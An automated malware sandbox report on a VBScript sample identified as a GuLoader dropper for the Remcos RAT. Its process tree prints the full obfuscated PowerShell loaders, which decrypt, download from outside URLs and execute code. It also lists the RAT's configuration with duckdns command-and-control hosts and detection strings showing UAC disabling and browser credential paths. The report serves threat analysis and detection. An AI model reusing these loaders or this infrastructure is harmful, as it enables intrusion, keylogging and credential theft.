Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
createdthingstobefrankwithmeeverywhere.gIF.vbs

Overview

General Information

Sample name:createdthingstobefrankwithmeeverywhere.gIF.vbs
Analysis ID:1483434
MD5:4d03b030f4db434da80e0ec3fa7e4398
SHA1:0b4eed00595be5235f5a51cebeda6fa31402b94b
SHA256:90afe2e4506b34bd63e597279707d13c6d8512fd52e0b670c9e45890211c76b6
Tags:vbs
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected GuLoader
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3500 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 5684 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • wscript.exe (PID: 7060 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7356 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 7632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • cmd.exe (PID: 7716 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • RegAsm.exe (PID: 5792 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 3920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 6056 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\sfvnspt.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Click to see the 23 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          4.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            4.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            4.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6656c:$str_b2: Executing file:
            • 0x675ec:$str_b3: GetDirectListeningPort
            • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x67118:$str_b7: \update.vbs
            • 0x66594:$str_b9: Downloaded file:
            • 0x66580:$str_b10: Downloading file:
            • 0x66624:$str_b12: Failed to upload file:
            • 0x675b4:$str_b13: StartForward
            • 0x675d4:$str_b14: StopForward
            • 0x67070:$str_b15: fso.DeleteFile "
            • 0x67004:$str_b16: On Error Resume Next
            • 0x670a0:$str_b17: fso.DeleteFolder "
            • 0x66614:$str_b18: Uploaded file:
            • 0x665d4:$str_b19: Unable to delete:
            • 0x67038:$str_b20: while fso.FileExists("
            • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
            4.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6637c:$s1: CoGetObject
            • 0x66390:$s1: CoGetObject
            • 0x663ac:$s1: CoGetObject
            • 0x70338:$s1: CoGetObject
            • 0x6633c:$s2: Elevation:Administrator!new:
            Click to see the 15 entries

            Other

            SourceRuleDescriptionAuthorStrings
